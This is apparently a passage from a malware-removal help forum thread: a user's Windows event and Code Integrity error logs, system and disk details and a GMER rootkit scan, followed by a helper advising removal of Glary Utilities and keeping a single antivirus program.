Error: (08/26/2014 08:02:26 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_0> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/26/2014 09:30:24 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/26/2014 09:27:53 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/26/2014 09:27:53 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/26/2014 08:38:21 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: C:\Windows\System32\bcmihvsrv.dll
 
Error: (08/26/2014 08:38:21 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: C:\Windows\System32\bcmihvsrv.dll
 
Error: (08/26/2014 08:38:19 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: C:\Windows\System32\bcmihvsrv.dll
 
Error: (08/26/2014 08:38:07 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/26/2014 08:37:53 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/26/2014 08:31:40 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/26/2014 08:27:41 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: 1Restart the serviceWindows Search%%1056
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-26 14:19:44.053
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.932
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.818
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.702
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.480
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.364
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.231
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:43.107
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:30.293
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-26 14:19:30.170
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 40%
Total physical RAM: 3060.46 MB
Available physical RAM: 1835.2 MB
Total Pagefile: 6351.2 MB
Available Pagefile: 5287.46 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.12 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.05 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: (CC) (Removable) (Total:1.92 GB) (Free:1.87 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)
Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 
GMER
 
GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-08-26 14:15:47
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 ST3500620AS rev.DE12 465.76GB
Running: b0x2w0jw.exe; Driver: C:\Users\SAVAS~1.KYR\AppData\Local\Temp\kxrdrkod.sys
 
 
---- Kernel code sections - GMER 2.1 ----
 
?               C:\ComboFix\catchme.sys                                                                     The system cannot find the path specified. !
?               C:\Windows\system32\Drivers\PROCEXP113.SYS                                                  The system cannot find the file specified. !
 
---- Devices - GMER 2.1 ----
 
AttachedDevice  \Driver\tdx \Device\Tcp                                                                     avgtdix.sys
AttachedDevice  \Driver\tdx \Device\Udp                                                                     avgtdix.sys
AttachedDevice  \Driver\tdx \Device\RawIp                                                                   avgtdix.sys
AttachedDevice  \FileSystem\fastfat \Fat                                                                    fltmgr.sys
 
---- Registry - GMER 2.1 ----
 
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update@NextDetectionTime  2014-08-26 17:34:02
Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update@NextSqmReportTime  2014-08-26 17:34:02
 
---- EOF - GMER 2.1 ----
 

OK. Before we move any further we need to rectify two things:

1. Glary Utilities - this program won't speed up your machine. Instead, it can be harmful when performing some optimizing tweaks, registry cleaning and so on. I strongly recommend uninstalling it.

2. Time to make a decision about AV. There needs to be only one installed.
